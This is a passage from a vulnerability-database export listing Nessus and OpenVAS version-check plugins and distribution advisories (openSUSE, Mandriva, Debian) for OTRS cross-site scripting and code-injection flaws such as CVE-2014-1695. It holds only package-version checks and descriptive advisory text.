LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75286);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-1695\");\n script_bugtraq_id(65844);\n\n script_name(english:\"openSUSE Security Update : otrs (openSUSE-SU-2014:0360-1)\");\n script_summary(english:\"Check for the openSUSE-2014-202 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The OTRS ticket system was updated to 3.1.20 / 3.2.15 :\n\nOn openSUSE 12.3 it was updated to 3.1.20: (fix for OSA-2014-03,\nCVE-2014-1695)\n\n - Improved HTML filter.\n\n - 3.1.19 2014-01-28\n\n - Fixed bug#10158 - Missing quoting in\n State::StateGetStatesByType().\n\n - Fixed bug#10099 - Missing challenge token checks on\n customer interface.\n\n - Fixed bug#8489 - setting Tickets per page resets\n AgentTicketQueue.\n\n - Fixed bug#9661 - Useless code in DynamicField backend.\n\n - Fixed bug#9622 - Actions in Small ticket overview don't\n work when cookies are turned off.\n\n - Fixed bug#9541 - Package manager cannot use https proxy.\n\n - Fixed bug#9594 - No auto-reply sent with multiple From\n addresses in AgentTicketPhone on PostgreSQL and Oracle.\n\n - Fixed bug#3434 - Validity of search time frame not\n checked by OTRS.\n\n - Fixed bug#9596 - On merge and bounce screens is\n confusing when fill or not 'To', 'Subject' and 'Body'\n fields.\n\n - Fixed bug#9595 - Incomplete page reload handling in\n merge and bounce.\n\n - Fixed bug#3007 - CheckMXRecord and CheckEmailAddresses\n have no effect on AgentTicketBounce.\n\n - Fixed bug#9512 - Database error for invalid date in\n AgentTicketSearch.\n\n - Fixed bug#8835 - No article found for TicketID <TICKET\n ID> when showing group tickets\n\n - Fixed bug#9583 - Dynamic Fields of type Date have\n timestamp in notifications.\n\n - Fixed bug#9579 - SOAP Serializer used in\n Kernel/GenericInterface/Transport/ HTTP/SOAP.pm does not\n correctly set namespace.\n\n - Fixed bug#7359 - Setting pending states via generic\n agent does not set pending time.\n\n - Fixed bug#8380 - Middle name not displayed in\n AdminCustomerUser.\n\n - Fixed bug#9576 - GI TicketSearch Date and Date/Time\n dynamic fields are ignored.\n\n - Changed Dynamic Field SearchFieldParameterBuild() API,\n LayoutObject is now optional.\n\n - Fixed bug#9573 - Date and DateTime dynamic fields not\n considered in GenericAgent Jobs.\n\nOn openSUSE 13.1 it was updated to 3.2.15: (fix for OSA-2014-03,\nCVE-2014-1695)\n\n - Improved HTML filter.\n\n - Fixed bug#10207 - DynamicField Search-Function in\n CustomerFrontend is not working.\n\n - Followup for bug#9011 - New value after value mapping\n can't be 0.\n\n - Fixed bug#10214 - Value '0' for DynamicsFields prevents\n TicketCreation.\n\n - Fixed bug#9616 - Too long activities and transitions are\n not displayed correctly.\n\n - Fixed bug#10212 - My tickets & Company tickets in 3.3.4.\n\n - Fixed bug#10205 - GenericInterface: Mandatory TimeUnits\n can't be 0.\n\n - Fixed bug#10196 - Ticket merge action does not notify\n the owner of the existing ticket.\n\n - Fixed bug#9692 - On PhoneOutbound articles, the FROM\n field shows Customer ID instead Agent ID.\n\n - Fixed bug#10189 - ProcessManagement: Use article subject\n if no ticket title is set.\n\n - Fixed bug#9654 - TicketUpdate operation doesn't work\n when authenticated as a customer.\n\n - Fixed bug#10137 - Generic interface TicketCreate\n operation doesn't work when authenticated as a customer.\n\n - 3.2.14\n\n - Fixed bug#10172 - Can't create process tickets with\n disabled richtext.\n\n - Fixed bug#10121 - QQMails break in OTRS.\n\n - Fixed bug#10158 - Missing quoting in\n State::StateGetStatesByType().\n\n - Fixed bug#8969 - FAQ module Language files installation\n fails (Kernel/Language permissions).\n\n - Fixed bug#9959 - & breaks ExpandCustomerName.\n\n - Fixed bug#10099 - Missing challenge token checks on\n customer interface.\n\n - Fixed bug#10103 - ArticleTypeID is always undef in\n AgentTicketCompose.\n\n - Added functionality to disable access to tickets of\n other customers with the same customer company in\n customer interface.\n\n - Fixed bug#9650 - Special character in customer id breaks\n Open Tickets in AgentTicketZoom.\n\n - Fixed bug#9723 - TicketAccountedTime stat does not run\n on Oracle with many tickets\n\n - Fixed bug#10077 - regular expressions in postmaster\n filter return 1 if no regex match.\n\n - Fixed bug#10070 - Wrong error message if Transition\n contains no transition actions.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=866476\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-03/msg00030.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected otrs packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:otrs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:otrs-itsm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"otrs-3.1.20-26.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"otrs-itsm-3.1.10-26.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"otrs-3.2.15-31.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"otrs-itsm-3.2.9-31.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"otrs\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-07T11:54:34", "description": "Updated otrs package fixes security vulnerability :\n\nAn attacker could send a specially prepared HTML email to OTRS. If he\ncan then trick an agent into following a special link to display this\nemail, JavaScript code would be executed (CVE-2014-1695).", "edition": 25, "published": "2014-03-14T00:00:00", "title": "Mandriva Linux Security Advisory : otrs (MDVSA-2014:054)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1695"], "modified": "2014-03-14T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:otrs"], "id": "MANDRIVA_MDVSA-2014-054.NASL", "href": "https://www.tenable.com/plugins/nessus/73001", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:054. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73001);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-1695\");\n script_bugtraq_id(65844);\n script_xref(name:\"MDVSA\", value:\"2014:054\");\n\n script_name(english:\"Mandriva Linux Security Advisory : otrs (MDVSA-2014:054)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated otrs package fixes security vulnerability :\n\nAn attacker could send a specially prepared HTML email to OTRS. If he\ncan then trick an agent into following a special link to display this\nemail, JavaScript code would be executed (CVE-2014-1695).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0114.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected otrs package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:otrs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"otrs-3.2.15-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T09:38:42", "description": "An attacker who is logged into OTRS, a Ticket Request System, as an\nagent with write permissions for statistics can inject arbitrary code\ninto the system. This can lead to serious problems like privilege\nescalation, data loss, and denial of service. This issue is also known\nas CVE-2017-14635 and is resolved by upgrading to the latest upstream\nrelease of OTRS3.\n\n****IMPORTANT UPGRADE NOTES**** ===============================\n\nThis update requires manual intervention. We strongly recommend to\nbackup all files and databases before upgrading. If you use the MySQL\nbackend you should read Debian bug report #707075 and the included\nREADME.Debian file which will provide further information.\n\nIf you discover that the maintenance mode is still activated after the\nupdate, we recommend to remove /etc/otrs/maintenance.html and\n/var/lib/otrs/httpd/htdocs/maintenance.html which will resolve the\nissue .\n\nIn addition the following security vulnerabilities were also \naddressed :\n\nCVE-2014-1695 Cross-site scripting (XSS) vulnerability in OTRS allows\nremote attackers to inject arbitrary web script or HTML via a crafted\nHTML email\n\nCVE-2014-2553 Cross-site scripting (XSS) vulnerability in OTRS allows\nremote authenticated users to inject arbitrary web script or HTML via\nvectors related to dynamic fields\n\nCVE-2014-2554 OTRS allows remote attackers to conduct clickjacking\nattacks via an IFRAME element\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n3.3.18-1~deb7u1.\n\nWe recommend that you upgrade your otrs2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-10-02T00:00:00", "title": "Debian DLA-1119-1 : otrs2 security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-2554", "CVE-2014-1695", "CVE-2017-14635", "CVE-2014-2553"], "modified": "2017-10-02T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:otrs2", "p-cpe:/a:debian:debian_linux:otrs", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1119.NASL", "href": "https://www.tenable.com/plugins/nessus/103577", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1119-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103577);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-1695\", \"CVE-2014-2553\", \"CVE-2014-2554\", \"CVE-2017-14635\");\n script_bugtraq_id(65844, 66567, 66569);\n\n script_name(english:\"Debian DLA-1119-1 : otrs2 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An attacker who is logged into OTRS, a Ticket Request System, as an\nagent with write permissions for statistics can inject arbitrary code\ninto the system. This can lead to serious problems like privilege\nescalation, data loss, and denial of service. This issue is also known\nas CVE-2017-14635 and is resolved by upgrading to the latest upstream\nrelease of OTRS3.\n\n****IMPORTANT UPGRADE NOTES**** ===============================\n\nThis update requires manual intervention. We strongly recommend to\nbackup all files and databases before upgrading. If you use the MySQL\nbackend you should read Debian bug report #707075 and the included\nREADME.Debian file which will provide further information.\n\nIf you discover that the maintenance mode is still activated after the\nupdate, we recommend to remove /etc/otrs/maintenance.html and\n/var/lib/otrs/httpd/htdocs/maintenance.html which will resolve the\nissue .\n\nIn addition the following security vulnerabilities were also \naddressed :\n\nCVE-2014-1695 Cross-site scripting (XSS) vulnerability in OTRS allows\nremote attackers to inject arbitrary web script or HTML via a crafted\nHTML email\n\nCVE-2014-2553 Cross-site scripting (XSS) vulnerability in OTRS allows\nremote authenticated users to inject arbitrary web script or HTML via\nvectors related to dynamic fields\n\nCVE-2014-2554 OTRS allows remote attackers to conduct clickjacking\nattacks via an IFRAME element\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n3.3.18-1~deb7u1.\n\nWe recommend that you upgrade your otrs2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00036.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/otrs2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected otrs, and otrs2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:otrs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:otrs2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"otrs\", reference:\"3.3.18-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"otrs2\", reference:\"3.3.18-1~deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:37:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1695"], "description": "This host is running OTRS (Open Ticket Request System) and is prone to html\ninjection vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2014-03-04T00:00:00", "id": "OPENVAS:1361412562310804243", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804243", "type": "openvas", "title": "OTRS Email HTML Injection Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_otrs_email_html_inj_vuln.nasl 11867 2018-10-12 10:48:11Z cfischer $\n#\n# OTRS Email HTML Injection Vulnerability\n#\n# Authors:\n# Shashi Kiran N <nskiran@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:otrs:otrs\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804243\");\n script_version(\"$Revision: 11867 $\");\n script_cve_id(\"CVE-2014-1695\");\n script_bugtraq_id(65844);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:48:11 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-04 17:31:09 +0530 (Tue, 04 Mar 2014)\");\n script_name(\"OTRS Email HTML Injection Vulnerability\");\n\n\n script_tag(name:\"summary\", value:\"This host is running OTRS (Open Ticket Request System) and is prone to html\ninjection vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"An error exists in OTRS core system which fails to properly sanitize\nuser-supplied input before using it in dynamically generated content\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to steal the victim's\ncookie-based authentication credentials.\");\n script_tag(name:\"affected\", value:\"Open Ticket Request System (OTRS) version 3.1.x before 3.1.20, 3.2.x before 3.2.15,\nand 3.3.x before 3.3.5\");\n script_tag(name:\"solution\", value:\"Upgrade to OTRS version 3.1.20 or 3.2.15 or 3.3.5 or later.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57018\");\n script_xref(name:\"URL\", value:\"https://www.otrs.com/security-advisory-2014-03-xss-issue\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"secpod_otrs_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"OTRS/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.otrs.com\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\n\nif(!otrsport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(vers = get_app_version(cpe:CPE, port:otrsport))\n{\n if(version_in_range(version:vers, test_version:\"3.1.0\", test_version2:\"3.1.19\") ||\n version_in_range(version:vers, test_version:\"3.2.0\", test_version2:\"3.2.14\") ||\n version_in_range(version:vers, test_version:\"3.3.0\", test_version2:\"3.3.4\"))\n {\n security_message(port:otrsport);\n exit(0);\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-01-29T20:09:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-2554", "CVE-2014-1695", "CVE-2017-14635", "CVE-2014-2553"], "description": "n attacker who is logged into OTRS, a Ticket Request System, as an\nagent with write permissions for statistics can inject arbitrary code\ninto the system. This can lead to serious problems like privilege\nescalation, data loss, and denial of service. This issue is also known\nas CVE-2017-14635 and is resolved by upgrading to the latest upstream\nrelease of OTRS3.\n\n****IMPORTANT UPGRADE NOTES****\n===============================\n\nThis update requires manual intervention. We strongly recommend to\nbackup all files and databases before upgrading. If you use the MySQL\nbackend you should read Debian bug report #707075 and the included\nREADME.Debian file which will provide further information.\n\nIf you discover that the maintenance mode is still activated after the\nupdate, we recommend to remove /etc/otrs/maintenance.html and\n/var/lib/otrs/httpd/htdocs/maintenance.html which will resolve the issue\n.\n\nIn addition the following security vulnerabilities were also addressed:\n\nCVE-2014-1695\nCross-site scripting (XSS) vulnerability in OTRS allows remote\nattackers to inject arbitrary web script or HTML via a crafted HTML\nemail\n\nCVE-2014-2553\nCross-site scripting (XSS) vulnerability in OTRS allows remote\nauthenticated users to inject arbitrary web script or HTML via\nvectors related to dynamic fields\n\nCVE-2014-2554\nOTRS allows remote attackers to conduct clickjacking attacks via an\nIFRAME element", "modified": "2020-01-29T00:00:00", "published": "2018-02-07T00:00:00", "id": "OPENVAS:1361412562310891119", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891119", "type": "openvas", "title": "Debian LTS: Security Advisory for otrs2 (DLA-1119-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891119\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2014-1695\", \"CVE-2014-2553\", \"CVE-2014-2554\", \"CVE-2017-14635\");\n script_name(\"Debian LTS: Security Advisory for otrs2 (DLA-1119-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-07 00:00:00 +0100 (Wed, 07 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00036.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"otrs2 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n3.3.18-1~deb7u1.\n\nWe recommend that you upgrade your otrs2 packages.\");\n\n script_tag(name:\"summary\", value:\"n attacker who is logged into OTRS, a Ticket Request System, as an\nagent with write permissions for statistics can inject arbitrary code\ninto the system. This can lead to serious problems like privilege\nescalation, data loss, and denial of service. This issue is also known\nas CVE-2017-14635 and is resolved by upgrading to the latest upstream\nrelease of OTRS3.\n\n****IMPORTANT UPGRADE NOTES****\n===============================\n\nThis update requires manual intervention. We strongly recommend to\nbackup all files and databases before upgrading. If you use the MySQL\nbackend you should read Debian bug report #707075 and the included\nREADME.Debian file which will provide further information.\n\nIf you discover that the maintenance mode is still activated after the\nupdate, we recommend to remove /etc/otrs/maintenance.html and\n/var/lib/otrs/httpd/htdocs/maintenance.html which will resolve the issue\n.\n\nIn addition the following security vulnerabilities were also addressed:\n\nCVE-2014-1695\nCross-site scripting (XSS) vulnerability in OTRS allows remote\nattackers to inject arbitrary web script or HTML via a crafted HTML\nemail\n\nCVE-2014-2553\nCross-site scripting (XSS) vulnerability in OTRS allows remote\nauthenticated users to inject arbitrary web script or HTML via\nvectors related to dynamic fields\n\nCVE-2014-2554\nOTRS allows remote attackers to conduct clickjacking attacks via an\nIFRAME element\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"otrs\", ver:\"3.3.18-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"otrs2\", ver:\"3.3.18-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-1695"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:054\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : otrs\r\n Date : March 13, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Updated otrs package fixes security vulnerability:\r\n \r\n An attacker could send a specially prepared HTML email to OTRS. If\r\n he can then trick an agent into following a special link to display\r\n this email, JavaScript code would be executed (CVE-2014-1695).\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1695\r\n http://advisories.mageia.org/MGASA-2014-0114.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n f913ce8f777c607662375c4cd63995b3 mbs1/x86_64/otrs-3.2.15-1.mbs1.noarch.rpm \r\n 